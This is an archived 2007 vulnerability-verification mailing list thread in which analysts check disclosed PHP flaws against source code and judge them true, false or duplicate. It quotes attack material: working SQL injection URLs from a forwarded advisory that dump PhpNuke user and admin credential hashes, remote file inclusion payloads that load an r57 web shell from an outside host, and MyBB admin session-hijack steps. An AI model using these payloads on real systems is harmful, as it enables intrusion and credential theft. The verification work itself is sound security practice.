disclosures all seem to stem from the same core module called "WF-Section: 1.01 (which was apparently renamed to "WF-Sections 1.02" in the fix). Looks like WF-Section(s) was popular enough that others wanted to modify it. Vendor ack is here: http://www.xoops.org/modules/news/article.php?storyid=3717 http://addons.zarilia.com/index.php?page_type=static&id=43 Diff's between WF-Sections 1.02's print.php and the print.php's from zmagazine and XFsection show sufficient commonality, but also demonstrate that the modifications of the original WF-Sections code were more than just a couple cosmetic changes, although version discrepancies are probably making things worse, too. - Steve From coley at linus.mitre.org Wed Apr 11 23:03:15 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 19:03:15 -0400 (EDT) Subject: [VIM] [false] Remote File Include In Script stat12 In-Reply-To: References: Message-ID: Darkfig, Agreed - I accidentally did a similar investigation because I forgot you had posted this :) I have no idea where the "stat12" came from since it's not part of the live site that appears to have the unparsed i-Stats code. If you change the "counter.php" on the live site to index.php, which was the program in the original disclosure, you have: require_once(LANGPATH . $cfg['langFile']); which obviously is not a "langpath" parameter. Hey Gadi - RaeD seems to be one of the worst offenders right now and identifies as Israeli. Do you feel like using your subtle, non-confrontational style to see if he can change his ways? ;-) - Steve On Tue, 3 Apr 2007, GM darkfig wrote: > Message: http://www.securityfocus.com/archive/1/464582/30/0/threaded > Author: RaeD at BsdMail.Com > > When we search "Copyright (c) 2004 by Sam Tang" there is only one > result (1) and on the server, the php is not interpreted ... we can > read the source code. The title of the script is not "stat12" but "PHP > i-Stats". The website (2) of the author is down. The file inclusion > will not work : require_once('global.php');...define('LANGPATH', > 'lang/'); > > [1] - http://www.tiger.edu.pl/ > [2] - http://www.samphp.com > From coley at mitre.org Wed Apr 11 23:57:09 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 19:57:09 -0400 (EDT) Subject: [VIM] Cyboards PHP RFI: true for 1.21, fixed in at least 1.25 Message-ID: <200704112357.l3BNv9WH028519@faron.mitre.org> Researcher: bd0rk Ref: http://www.milw0rm.com/exploits/3660 Version 1.21 is the URL provided by the researcher. Version 1.25 was obtained from http://www.hotscripts.com/Detailed/10651.html A diff of include/default_header.php says: diff -r cyboards-morph/include/default_header.php cyboards/include/default_header.php 13,15c13 < echo ""; --- > echo "\n\n"; So, the include got removed sometime between 1.21 and 1.25, probably accidentally. - Steve From coley at mitre.org Thu Apr 12 00:09:36 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 20:09:36 -0400 (EDT) Subject: [VIM] dispute: older CyBoards common.php RFI (CVE-2006-2871) Message-ID: <200704120009.l3C09aQt028751@faron.mitre.org> Researcher: SpC-x Ref: CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/435977/100/0/threaded Using the 1.25 code referenced in the previous post, we have: include("/home/www/forums/include/config.php"); include($script_path."/db/mysql.php"); ... and later uses. Inspections suggests that a failed inclusion would cause lots of problems, so the pathname would need to be changed during installation; this is also documented in readme.txt. config.php itself has: $script_path = "/home/www/forums"; // Unix path to the forum directory. Do not include a trailing slash config.php doesn't have any nested includes, requires, dynamic evaluation, or extract. $script_path is used in other include's in common.php but have the same negative results. - Steve From gmdarkfig at gmail.com Thu Apr 12 17:25:16 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Thu, 12 Apr 2007 19:25:16 +0200 Subject: [VIM] Milw0rm 3719 (Mybb <= 1.2.2) Message-ID: The guy use the same vulnerability I found (http://acid-root.new.fr/poc/28070403.txt). He use the same method (benchmark(), Client-IP, DELETE from prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's just the perl version. He use the solution number 1 I said in my exploit: # SOLUTION NUMBER 1 # mysql> select * from mybb_users\G # *************************** 1. row *************************** # uid: 1 # username: root # password: 39ac8681f5cf4fcd9c9c09719a618bd3 # salt: BFeJBOCF # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA... # # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto='); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # SOLUTION NUMBER 2 # mysql> select * from mybb_adminsessions\G # *************************** 1. row *************************** # sid: 81e267263b9254f3aaf670383bfbfec9 # uid: 1 # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA # ip: 127.0.0.1 # dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. From str0ke at milw0rm.com Thu Apr 12 17:51:58 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 12:51:58 -0500 Subject: [VIM] Milw0rm 3719 (Mybb <= 1.2.2) In-Reply-To: References: Message-ID: <814b9d50704121051m3d9f011dm87dd5b08dde7c07c@mail.gmail.com> It was posted to go along with his paper that went up today. Guessing he just wanted to show an example of it in action. http://www.milw0rm.com/papers/149 /str0ke On 4/12/07, GM darkfig wrote: > The guy use the same vulnerability I found > (http://acid-root.new.fr/poc/28070403.txt). > He use the same method (benchmark(), Client-IP, DELETE from > prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's > just the perl version. He use the solution number 1 I said in my > exploit: > > # SOLUTION NUMBER 1 > # mysql> select * from mybb_users\G > # *************************** 1. row *************************** > # uid: 1 > # username: root > # password: 39ac8681f5cf4fcd9c9c09719a618bd3 > # salt: BFeJBOCF > # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA... > # > # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto='); > # print $xpl->getcontent(); // ...Welcome to the MyBB Administration > Control Panel... > # > # SOLUTION NUMBER 2 > # mysql> select * from mybb_adminsessions\G > # *************************** 1. row *************************** > # sid: 81e267263b9254f3aaf670383bfbfec9 > # uid: 1 > # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA > # ip: 127.0.0.1 > # dateline: 1175443967 > # lastactive: 1175444369 > # > # $xpl->addheader('Client-IP','127.0.0.1'); > # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); > # print $xpl->getcontent(); // ...Welcome to the MyBB Administration > Control Panel... > # > # I decided to use the solution number 2. > From coley at mitre.org Thu Apr 12 17:55:00 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 12 Apr 2007 13:55:00 -0400 (EDT) Subject: [VIM] true: SimpCMS Light RFI Message-ID: <200704121755.l3CHt01p018840@faron.mitre.org> Researcher: Dr.RoVeR Ref: http://www.milw0rm.com/exploits/3705 index.php calls functions.php, which itself contains: if (isset($_GET[site])) { $site=$_GET[site]; } else { $site= "home"; } Later in index.php, we see the 'include $site.".php"' referenced by the researcher. So, in this case, it looks like we don't need register_globals. - Steve From coley at mitre.org Thu Apr 12 18:17:03 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 12 Apr 2007 14:17:03 -0400 (EDT) Subject: [VIM] true: Request It : Song Request System 1.0b RFI Message-ID: <200704121817.l3CIH3EN019352@faron.mitre.org> Researcher: hackberry.ath.cx Ref: Request It : Song Request System 1.0b - remote file inclusion http://www.securityfocus.com/archive/1/archive/1/465081/100/0/threaded Source inspection confirmed this: if(isset($id)) { if($id == 'home') { $id = "list"; } include($id.".php"); } - Steve From str0ke at milw0rm.com Thu Apr 12 18:34:41 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 13:34:41 -0500 Subject: [VIM] true: SimpCMS Light RFI In-Reply-To: <200704121755.l3CHt01p018840@faron.mitre.org> References: <200704121755.l3CHt01p018840@faron.mitre.org> Message-ID: <814b9d50704121134v75f17ea4n9c17cca023abde6a@mail.gmail.com> Seems that the Medium / Heavy versions are also affected. /str0ke On 4/12/07, Steven M. Christey wrote: > > Researcher: Dr.RoVeR > Ref: http://www.milw0rm.com/exploits/3705 > > index.php calls functions.php, which itself contains: > > if (isset($_GET[site])) > { > $site=$_GET[site]; > } > else > { > $site= "home"; > } > > Later in index.php, we see the 'include $site.".php"' referenced by > the researcher. > > So, in this case, it looks like we don't need register_globals. > > - Steve > From coley at mitre.org Thu Apr 12 18:45:03 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 12 Apr 2007 14:45:03 -0400 (EDT) Subject: [VIM] probably false: xodagallery execution claim Message-ID: <200704121845.l3CIj34F019910@faron.mitre.org> Researcher: the_3dit0r Ref: xodagallery Remote Code Execution Vulnerability http://www.securityfocus.com/archive/1/archive/1/465088/100/0/threaded Extracted code is: switch ($_GET['cmd']) line 64 Source inspection did not find a vulnerable use of cmd within this file. The above switch tests for constant values of $_GET['cmd']. There are some leading require's, but they seem pretty shallow. Grep throughout the entire system doesn't produce any "cmd" matches of interest. Since a lot of PHP code shells support "cmd", maybe this was tested against a previously hacked application with a backdoor in it. Assuming it was tested. - Steve From str0ke at milw0rm.com Thu Apr 12 19:32:19 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 14:32:19 -0500 Subject: [VIM] [milw0rm] 3720 & 2613 Message-ID: <814b9d50704121232i27d8c451p49577e3725571dec@mail.gmail.com> 3720 is a duplicate of 2613, removing 3720. /str0ke From theall at tenablesecurity.com Fri Apr 13 15:25:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 13 Apr 2007 11:25:30 -0400 Subject: [VIM] Dup: TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns Message-ID: <461FA0EA.6080903@tenablesecurity.com> Milw0rm 3707 seems to be a dup of 2030, attributed to Matdhule last July. [Which also means Bugtraq 23416 duplicates 18998.] TOSMO/Mambo merely bundles the affected software in it. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Fri Apr 13 18:02:42 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 13 Apr 2007 13:02:42 -0500 Subject: [VIM] DUP?: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke Message-ID: <814b9d50704131102r2e7350aaxc818b497b1f00944@mail.gmail.com> It seems brOmstar discovered the sql injection vulnerability in mid-2006. http://www.milw0rm.com/exploits/2170 /str0ke ---------- Forwarded message ---------- From: come2waraxe at yahoo.com Date: 13 Apr 2007 16:01:13 -0000 Subject: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke To: bugtraq at securityfocus.com [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke Author: Janek Vind "waraxe" Date: 13. April 2007 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-48.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ VWar module for PhpNuke http://www.vwar.de/ VWar is a webbased matchorganizing system for online gamers. The complete output is realised by PHP with MySQL as database backend. The system is divided into 2 parts, the public area and the admin area. VWar 1.5.0 R15 is out. Changes: fixed: mysql injection bug in extra/ files // I guess, they have not fixed all the bugs yet :) // Affected are Virtual War versions 1.5 R15 and below Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Found security bugs: one critical sql injection and two XSS bugs. There are probably more vulnerabilities, had no time for deeper analyze ... 1. XSS in "/modules/vwar/extra/today.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala Problem is caused by uninitialized variable "$title". Successful exploitation requires that "register_globals" is "on" in php settings. 2. XSS in "/modules/vwar/extra/login.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.target.com/modules/vwar/extra/login.php?memberlist= Similar to previous case this XSS is caused by uninitialized variable, in this time "$memberlist". Successful exploitation requires that "register_globals" is "on" in php settings. 3. Critical sql injection bug in many VWar scripts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Personally, I like uninitialized variables in php source code. They are giving so much cool possibilities to everyone, who is searching for secutity holes. And this serious sql injection case has his roots in same problem. Let's look @ "/modules/vwar/extra/online.php" line 63: ----------------[ from source code ]------------------ $query = $vwardb->query(" SELECT memberid, name, lastactivity FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)." "); ----------------[ /from source code ]----------------- And by the way - "$n" variable is not initialized! So what happens, if we issue this query: http://www.victim.com/modules/vwar/extra/online.php?n=waraxe Oops... We got error message: -> Database Error: Invalid SQL: SELECT memberid, name, lastactivity FROM vwarwaraxe_member WHERE lastactivity > 1176476015 -> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist -> MySQL Error Number: 1146 -> Date: 11.04.2007 @ 18:03 -> Script: /modules/vwar/extra/online.php?n=waraxe -> Referer: Now, can we exploit this sql injection? Let's try next move: http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/* 4.1.22 It works!! Now it's time for more serious fun: [[[[[ kidd0z - attentione ]]]]] http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/* ... and we get all vwar member usernames, password double-md5 hashes and emails http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/* ... and we have all the nuke admin usernames, md5 hashes and emails http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/* ... and finally, all the nuke user credentials in one big listing :) Remarks: R01 - Sentinel, Protector and other powerful phpnuke protection systems - they will not work against this exploits. Because we are not entering from front door, but will use rear window :) R02 - "register_globals" must be "on" for exploits to work R03 - phpnuke table prefix can be changed from default, in this case - no nuke user and admin data! R04 - there can be need for playing with "$n" value. Because vwar module installer can assaign different values besides empty value. So if default exploit will not work, then this can be tried: /online.php?n=0_member+WHERE /online.php?n=1_member+WHERE /online.php?n=2_member+WHERE ... and so on. And because we have perfect sql error feedback, then it is easy to overcome various exploiting problems. R05 - many other scripts in "extra" directory have same sql injection vulnerability! See ya soon and have a nice day ;) Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all other people who know me! Special greets goes to Raido Kerna. Tervitusi Torufoorumi rahvale! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe at yahoo.com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ Shameless advertise: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DX expedition database - http://www.dxdb.com/ Amateur Radio Database - http://www.hamdb.com/ ---------------------------------- [ EOF ] ------------------------------------ From gmdarkfig at gmail.com Sat Apr 14 08:50:47 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 14 Apr 2007 10:50:47 +0200 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! [misc.php] Message-ID: Title: Vbulletin 3.6.5 Sql Injection ! [misc.php] Link: http://www.securityfocus.com/archive/1/465647/30/0/threaded Author: seko at se-ko.info (SekoMirza) print q{ ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # # // SekoMirza // Turkish Hackerz # ###################################################### }; He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection Exploit) http://www.milw0rm.com/exploits/1793. From theall at tenablesecurity.com Sat Apr 14 11:21:40 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sat, 14 Apr 2007 07:21:40 -0400 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! [misc.php] In-Reply-To: References: Message-ID: <4620B944.1060906@tenablesecurity.com> On 04/14/07 04:50, GM darkfig wrote: > He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection > Exploit) http://www.milw0rm.com/exploits/1793. Is vBulletin affected? In looking around, I found vBulletin installs that do have a misc.php, but it didn't seem like they make use of a parameter named 'sub'. George -- theall at tenablesecurity.com From gmdarkfig at gmail.com Sat Apr 14 12:12:55 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 14 Apr 2007 14:12:55 +0200 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! [misc.php] In-Reply-To: <4620B944.1060906@tenablesecurity.com> References: <4620B944.1060906@tenablesecurity.com> Message-ID: Not affected. They just have the same filename, not the same content. 2007/4/14, George A. Theall : > On 04/14/07 04:50, GM darkfig wrote: > > > He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection > > Exploit) http://www.milw0rm.com/exploits/1793. > > Is vBulletin affected? In looking around, I found vBulletin installs > that do have a misc.php, but it didn't seem like they make use of a > parameter named 'sub'. > > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Sat Apr 14 17:19:04 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 14 Apr 2007 12:19:04 -0500 Subject: [VIM] true until installed: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities Message-ID: <814b9d50704141019l2935983dkf9167f2249b3783b@mail.gmail.com> Once the product is installed it doesn't seem vulnerable since require "../config.php"; contains the $auth_method variable. After checking header.php in the root directory (the second included file) it does seem vulnerable to rfi. wrote: > """"""""""""""""""""""""""""""""""""""""""""""" > """ :: :: ::::: :::: """ > """ :: :: :: : :: """ > """ :::: :: :: ::::: ::::: :::: """ > """ :: :: ::: ::: :: :: :: :: :: """ > """ :: :: :: : : ::::: :: :: :::: """ > """ """ > """"""""""""""""""""""""""""""""""""""""""""""" > Xmor$ Security Vulnerability Research TM > > > # Tilte: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities > > > # Author..................: [the_Edit0r] > # HomePage ...............: [Www.XmorS-sEcurity.coM] > # Location ...............: [Iran] > # Software ...............: [MobilePublisherphp] > # Impact..................: [ Remote ] > # Site Script ............: [http://sourceforge.net/projects/mpphp/] > # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] > > > > > > ------------------------------- proof Of Concept --------------------------- > > > > www.example.com/[path]/admin/index.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/list.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/postreview.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/reindex.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/sections.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/templates.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/userinfo.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/users.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/view.php?auth_method=[Shell-Script] > > > ---------------------------------------------------------------------------- > > > > > > # Contact me : the_3dit0r[at]Yahoo[dot]coM > > # [XmorS-SEcurity.coM] > > > From str0ke at milw0rm.com Sat Apr 14 17:53:23 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 14 Apr 2007 12:53:23 -0500 Subject: [VIM] false: Maian Search v1.1 Message-ID: <814b9d50704141053h3674e75dpa0055218bffff459@mail.gmail.com> The script contains the below, lines 18/20. if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; /str0ke ---------- Forwarded message ---------- From: k4rtal at gmail.com Date: 14 Apr 2007 15:24:03 -0000 Subject: Maian Search v1.1 To: bugtraq at securityfocus.com ########################################################################### # # Script Name : Maian Search v1.1 # # Download : http://www.maianscriptworld.co.uk/freestuff_1975_search.html # # Coded by : KaRTaL # # Contact : k4rtal[at]gmail[dot]com ########################################################################### # # Include : include($path_to_folder.'inc/db_connection.inc.php'); # # # Exploit : search.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id # # ########################################################################### # # # Thankxz : D3ngsz | Ekin0x | Doublekickx | Cr at zy_King | M3rhametsiz | MaNaR # # # # # Dengesiz Team ########################################################################### From gmdarkfig at gmail.com Sun Apr 15 12:45:54 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:45:54 +0200 Subject: [VIM] false: phpMyChat-0.14.5 Message-ID: Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id" phpMyChat.php3: $ChatPath = "chat/"; require("./${ChatPath}lib/index.lib.php3"); From gmdarkfig at gmail.com Sun Apr 15 12:46:22 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:46:22 +0200 Subject: [VIM] false: bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy Message-ID: Link: http://www.securityfocus.com/archive/1/465739/30/0/threaded Author: the_3dit0r at yahoo.com Quote from the thread: "www.example.com/[path]/install/index.php?content_php=[shell-Script]" install/index.php: include(SYS_WORK_DIR."/page_handler.php"); page_handler.php: case '3': $content_title = $strStep3; $content_html = "step3.html"; $content_php = "step3.php"; break; case '2': $content_title = $strStep2; $content_html = "step2.html"; $content_php = "step2.php"; break;[...] install/index.php (after): include(SYS_WORK_DIR."/".$content_php); From gmdarkfig at gmail.com Sun Apr 15 12:46:46 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:46:46 +0200 Subject: [VIM] false: Maian Weblog v3.1 Message-ID: Link: http://www.securityfocus.com/archive/1/465735/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "index.php?path_to_folder=http://shelladresin.com/r57.txt?cmd=id" index.php: if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; From gmdarkfig at gmail.com Sun Apr 15 12:47:05 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:05 +0200 Subject: [VIM] false: Back-End CMS Database Tables v0.4.7 Remote File Include Vulnerabilities Message-ID: Link: http://www.securityfocus.com/archive/1/465734/30/0/threaded Author: the_Edit0r Quote from the thread: "www.example.com/[path]/htdocs/site-admin/index.php?includes_path=[Shell-Script]" index.php (and the others files): require("includes_path.php"); require($includes_path . "/includes.inc"); includes_path.php: $includes_path = "/home/be480/includes"; From gmdarkfig at gmail.com Sun Apr 15 12:47:23 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:23 +0200 Subject: [VIM] false: B2evolution 1.6 RFi Message-ID: Link: http://www.securityfocus.com/archive/1/465733/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "script_path/blogs/index.php?core_subdir=http://shelladresi,.com/r57.txt?cmd=id" Even if there was a vulnerability, RFI is not possible. And there is no LFI. index.php: require_once dirname(__FILE__).'/evocore/_main.inc.php'; _main.inc.php: require_once dirname(__FILE__).'/../conf/_config.php'; _config.php: require_once dirname(__FILE__).'/_advanced.php'; _advanced.php: $core_subdir = 'evocore/'; From gmdarkfig at gmail.com Sun Apr 15 12:47:36 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:36 +0200 Subject: [VIM] false: Maian Gallery v1.0 Message-ID: Link: http://www.securityfocus.com/archive/1/465732/30/0/threaded Author: k4rtal[at]gmail[dot].com Quote from the thread: "index.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id" index.php: if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; From coley at linus.mitre.org Mon Apr 16 01:26:12 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 15 Apr 2007 21:26:12 -0400 (EDT) Subject: [VIM] false: phpMyChat-0.14.5 In-Reply-To: References: Message-ID: Wow, that's some of the strongest evidence of "grep and gripe" I've seen yet. Ouch. Assuming that PHP doesn't treat "{}" as valid variable characters... ya never really know with that language. On Sun, 15 Apr 2007, GM darkfig wrote: > Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded > Author: k4rtal[at]gmail[dot]com > > Quote from the thread: > "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id" > > phpMyChat.php3: > $ChatPath = "chat/"; > require("./${ChatPath}lib/index.lib.php3"); > From theall at tenablesecurity.com Mon Apr 16 18:46:31 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 14:46:31 -0400 Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities Message-ID: <4623C487.5050703@tenablesecurity.com> The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those posted back in 2002 by avart at gmx.de; eg, http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something? George -- theall at tenablesecurity.com From coley at linus.mitre.org Mon Apr 16 21:42:34 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 16 Apr 2007 17:42:34 -0400 (EDT) Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities In-Reply-To: <4623C487.5050703@tenablesecurity.com> References: <4623C487.5050703@tenablesecurity.com> Message-ID: No, looks like a dupe to me, too. In this case, CVE-2002-1412 was already claimed to affect versions before 1.3.1, with vendor acknowledgement and fix. If this new disclosure had been for a NEWER version than 1.3.1, then this might have been a regression error and could be argued to get a new tag (certainly for CVE it would). But since this newer disclosure is actually for an OLDER version than what was already reported, CVE assumes there was no regression (for the sake of sanity). i.e., they are dupes. - Steve On Mon, 16 Apr 2007, George A. Theall wrote: > The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those > posted back in 2002 by avart at gmx.de; eg, > > http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html > > and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something? > > George > -- > theall at tenablesecurity.com > From theall at tenablesecurity.com Tue Apr 17 01:37:31 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 21:37:31 -0400 Subject: [VIM] Not Quite: Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit Message-ID: <462424DB.7020604@tenablesecurity.com> Bugtraq 23519 is not quite right. It concerns the Gallery script, included as part of the Simple PHP Scripts project on SourceForge, http://sourceforge.net/projects/sphp/. The PoC accompanying the BID tries to exploit the flaw via the 'dir' parameter of the 'index.php' script. Let's have a look, though. Code in index.php from gallery-0.3.tar.bz2 looks like this: $dir = '.'; session_start(); if (empty($_SESSION['images']) || isset($_GET['reload'])) { session_destroy(); session_start(); ... if (!empty($_REQUEST['gallery'])) $_SESSION['gallery'] = $_REQUEST['gallery']; if (!empty($_SESSION['gallery'])) $dir = $_SESSION['gallery']; ... if (file_exists($dir.'/gallery.inc.php')) include($dir.'/gallery.inc.php'); $dir is initialized early on and the omitted code doesn't offer any possibility to override it via, say, some type of register globals emulation. Yet as should be obvious, there is a file include issue that can be easily exploited. It's just that an attacker needs to use the 'gallery' request parameter rather than 'dir' and ensure the session is a new one. Another problem with the advisory is that the call to file_exists() above limits the types of remote files that can be included. For example, something like 'http://www.different-site.com/cmd.txt' as used in the advisory won't fly but something like '//computername/share/filename' might. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Apr 17 02:04:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 22:04:30 -0400 Subject: [VIM] False: Joomla/Mambo Jambook v1.0 beta7 Rfi Vuln. Message-ID: <46242B2E.7040903@tenablesecurity.com> Bugtraq 23509 looks false. It concerns a remote file include flaw in a third-party component for Mambo / Joomla called Jambook. I installed 1.0 beta7, which crazy_king claims is affected. Here's the code in 'components/com_jambook/jambook.php': if ( !defined( '_VALID_MOS' ) && !defined('_JEXEC') ) die( 'Direct Access to this location is not allowed.' ); global $option, $Itemid; //Get right Language file if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) { include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php"); } else { include_once("$mosConfig_absolute_path/components/$option/language/english.php"); } // Read configuration file include_once("$mosConfig_absolute_path/components/$option/configuration.php"); // Read a file containing the jxTemplate class require_once("$mosConfig_absolute_path/components/$option/jxtemplate.php"); // Read frontend html classes require_once( $mainframe->getPath( 'front_html' ) ); // Read database class information require_once( $mainframe->getPath( 'class' ) ); // Read a file with common functions require_once("$mosConfig_absolute_path/components/$option/jambook.common.php"); // Read a file with the CAPTCHA class require_once("$mosConfig_absolute_path/components/$option/ocr_captcha.class.php"); Clearly, this file can't be called directly, so this advisory is bogus. I wonder, though, why crazy_king felt the need to skip the first couple of similar function calls and alert us to the require_once() later on. Perhaps we'll be treated with similar warnings from him in the future... George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Apr 17 19:23:21 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 17 Apr 2007 15:23:21 -0400 Subject: [VIM] Bugtraq 23534 Message-ID: <46251EA9.2030701@tenablesecurity.com> Anybody seen the advisory for Bugtraq 23534 yet? It supposedly involves a remote file include issue in the Gallery script from Simple PHP Scripts and is from SekoMirza, one of the "researchers" who covered a similar "issue" in Ivan Gallery (Bugtraq 23519). The new Bugtraq entry claims the flaw involves the 'textFile' parameter of the 'gallery_top.inc.php' script from Simple PHP Scripts Gallery 0.3. There is no such file included in the distribution nor does a grep of any of the files for 